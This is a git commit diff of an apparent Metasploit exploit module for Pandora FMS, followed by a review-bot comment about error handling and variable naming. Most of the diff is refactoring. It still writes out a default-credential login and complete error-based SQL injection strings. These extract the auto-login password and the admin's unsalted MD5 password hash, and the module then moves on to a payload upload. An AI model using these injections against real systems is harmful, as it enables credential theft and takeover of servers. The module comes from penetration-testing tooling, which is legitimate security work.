Fail on upload errors

bug/bundler_fix
jvazquez-r7 2014-11-25 22:48:57 -06:00
parent b24e641e97
commit 5a2d2914a9
1 changed files with 17 additions and 19 deletions


@ -86,9 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Attempt to login with credentials (default admin:pandora)
def authenticate
# Attempt to login with default credentials (admin:pandora)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
@ -105,17 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
return auth_succeeded?(res)
end
# Attempt to login with auto login and SQLi
def login_hash
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
clue = rand_text_alpha(8)
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select value from tconfig where token = 'loginhash_pwd';
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "BY x)a) AND 'msf'='msf"
password = inject_sql(sqli, sqlq)
password = inject_sql(sqli, clue)
if password && password.length != 0
print_status("#{peer} - Extracted auto login password (#{password})")
@ -163,15 +162,16 @@ class Metasploit3 < Msf::Exploit::Remote
def extract
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
clue = rand_text_alpha(8)
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select password from tusuario where id_user = 0;
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL"
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
sqli << ",0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << "x)a) AND 'msf'='msf"
password = inject_sql(sqli, sqlq)
password = inject_sql(sqli, clue)
if password && password.length != 0
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
@ -227,8 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
hash = $1
else
print_error("#{peer} - Could not extract hash from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract hash2
@ -236,8 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
hash2 = $1
else
print_error("#{peer} - Could not extract hash2 from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract real_directory
@ -245,11 +243,11 @@ class Metasploit3 < Msf::Exploit::Remote
real_directory = $1
else
print_error("#{peer} - Could not extract real_directory from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
else
print_error("#{peer} - Could not identify upload form!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
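Review bot: The four new `fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")` calls (after the hash, hash2, real_directory and upload-form checks) all raise the same generic reason and message, so the specific cause survives only in the preceding `print_error` line and is lost to anything that records the failure. Each branch is a response that lacked an expected field, so `Failure::UnexpectedReply` with the specific text would fit better, e.g. `fail_with(Failure::UnexpectedReply, "#{peer} - Could not extract hash from response!")`, and the separate `print_error` could then be dropped. Separately, the renamed hex string is `sql_clue` in `login_hash` but `hex_clue` in `extract`; one name for both would read better. The method containing these checks begins and ends outside the visible hunks, so whether its callers still test for the old `false` return cannot be confirmed from here.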